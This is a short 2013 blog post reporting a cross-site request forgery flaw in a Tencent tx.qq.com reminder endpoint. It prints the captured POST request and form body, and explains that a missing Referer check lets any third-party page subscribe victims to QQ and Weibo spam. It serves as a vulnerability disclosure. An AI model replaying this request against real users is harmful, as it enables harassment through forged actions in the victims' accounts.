A CSRF in a Tencent 爱玩 (tx.qq.com) endpoint lets an attacker harass users (QQ popups + QQ chat messages + Weibo)

[screenshot: wps_clip_image-24519]

Click the "remind me" button and capture the request:

POST /dyid_proc.php HTTP/1.1
Host: tx.qq.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:22.0) Gecko/20100101 Firefox/22.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://tx.qq.com/proxy.html
Content-Length: 61
Cookie: .....
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

POST body (application/x-www-form-urlencoded; 61 bytes, matching the Content-Length above):

id=5547&interval=180&stype=0&threshold=1&tips_type=7&type=new

That is all it takes to subscribe the victim to the reminder, after which they get spammed with popups.

[screenshot: wps_clip_image-4481]

[screenshot: wps_clip_image-19554]

Confirmed: the endpoint does no source (Referer) verification at all, so any third-party page can replay this request with the victim's cookies~

posted @ 2013-07-11 13:37  y0umer  views (248)  comments (0)